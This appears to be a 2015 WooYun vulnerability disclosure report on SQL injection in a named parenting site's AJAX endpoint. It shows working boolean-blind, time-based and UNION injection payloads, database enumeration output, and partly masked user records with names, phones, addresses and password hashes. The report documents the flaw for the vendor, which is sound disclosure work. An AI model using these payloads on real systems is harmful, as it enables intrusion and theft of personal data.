乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-17: 细节已通知厂商并且等待厂商处理中 2015-04-17: 厂商已经确认,细节仅向厂商公开 2015-04-27: 细节向核心白帽子及相关领域专家公开 2015-05-07: 细节向普通白帽子公开 2015-05-17: 细节向实习白帽子公开 2015-06-01: 细节向公众公开
233
http://try.mama.cn/do_ajax.php?area_id=2&do=area参数id12-2*5+0+0+1-1 返回 TRUE12-2*6+0+0+1-1 返回 FALSE2 AND 2+1-1-1=1 AND 380=380 返回 TRUE2 AND 3+1-1-1=1 AND 380=380 返回 FALSE可知,漏洞存在
---Parameter: area_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: area_id=2 AND 9680=9680&do=area Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: area_id=2 AND (SELECT * FROM (SELECT(SLEEP(5)))LJBO)&do=area Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: area_id=2 UNION ALL SELECT CONCAT(0x7176626a71,0x7050487357756666456b,0x717a706b71),NULL,NULL,NULL-- &do=area---web application technology: PHP 5.3.28back-end DBMS: MySQL 5.0.12Database: try[49 tables]+-----------------------+| spe_admin | 3个管理员账户| syw_activity |。。。。。。Database: try+-----------------------+---------+| Table | Entries |+-----------------------+---------+| syw_apply | 1348949 || syw_optionvars | 995365 || syw_user | 974296 | 97万Table: syw_user[10 entries]+-----+---------+------------+-------------+-------------+------------------------+-------------+---------+---------+---------+---------+--------------------+---------+----------+----------------------------------+----------+----------+---------------+----------+------------+------------+-----------+------------+------------+-------------+-------------+| id | city_id | discuz_uid | province_id | district_id | email | phone | handle | from | zipcode | updates | address | credits | baby_sex | password | is_start | is_daren | username | realname | add_time | lastvisit | baby_name | baby_birth | babystatus | active_time | update_time |+-----+---------+------------+-------------+-------------+------------------------+-------------+---------+---------+---------+---------+--------------------+---------+----------+----------------------------------+----------+----------+---------------+----------+------------+------------+-----------+------------+------------+-------------+-------------+| 401 | 455 | 5430025 | 20 | 0 | 3424**[email protected] | 13802***81 | <blank> | <blank> | 510160 | 0 | 荔湾区**1B708 | 50 | 0 | e10adc3949ba***6e057f20f883e | 1 | 0 | lad**410216 | 钟** | 0 | 1312902368 | <blank> | 0000-00-00 | 0 | 0 | 0 || 400 | 455 | 5189049 | 20 | 0 | 5885**@qq.com | 137***815 | <blank> | <blank> | 501000 | 0 | 荔湾区石路** | 75 | 2 | e10adc3949b**e057f20f883e | 1 | 0 | 懒懒公主 | 周** | 0 | 13073***05 | 龚** | 2009-12-01 | 0 | 0 | 0 |用户 姓名,电话,家庭住址,账号密码。。。。
这信息要是泄露出去,诈骗事件又会有更多了。还会对用户产生更大的伤害。希望厂商重视。
危害等级:中
漏洞Rank:10
确认时间:2015-04-17 14:05
谢谢
暂无